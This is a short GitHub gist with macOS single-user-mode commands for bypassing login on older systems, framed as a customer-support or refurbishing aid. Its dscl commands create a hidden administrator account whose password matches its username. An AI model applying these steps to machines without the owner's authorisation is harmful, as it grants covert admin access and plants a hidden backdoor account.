Skip to content

Instantly share code, notes, and snippets.

@vincenavarro

vincenavarro/osx_bypass.md

Created April 9, 2020 16:24
Show Gist options
  • Save vincenavarro/fc25b1a985cf1c23ffef0e5525ffb794 to your computer and use it in GitHub Desktop.
Save vincenavarro/fc25b1a985cf1c23ffef0e5525ffb794 to your computer and use it in GitHub Desktop.
Download ZIP
OSX single-user mode user authentication bypass.
Raw
osx_bypass.md

OSX single-user mode user authentication bypass.

This only works on older versions of OSX for use in customer support or refurbishing older machines. YMMV.

Start in single user mode then:

mount -uw /
rm /var/db/.AppleSetupDone
# reboot

Add a user:

/sbin/fsck -fy
/sbin/mount -uw /

launchctl load /System/Library/LaunchDaemons/com.apple.opendirectoryd.plist

dscl . -create /Users/[USERNAME] IsHidden 1
dscl . -create /Users/[USERNAME] UserShell /bin/bash
dscl . -create /Users/[USERNAME] RealName “Apple Care”
dscl . -create /Users/[USERNAME] UniqueID “555”
dscl . -create /Users/[USERNAME] PrimaryGroupID 20
dscl . -create /Users/[USERNAME] NFSHomeDirectory /var/[USERNAME]
dscl . -passwd /Users/[USERNAME] [USERNAME]

# Sometimes
# Pre-Yosemite omit IsHidden 1 and instead use UniqueID of < 500)
dscl . -delete "/SharePoints/[USERNAME]’s Public Folder"
dscl . -append /groups/admin GroupMembership [USERNAME]
dseditgroup -o edit -a [USERNAME] -t user admin
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment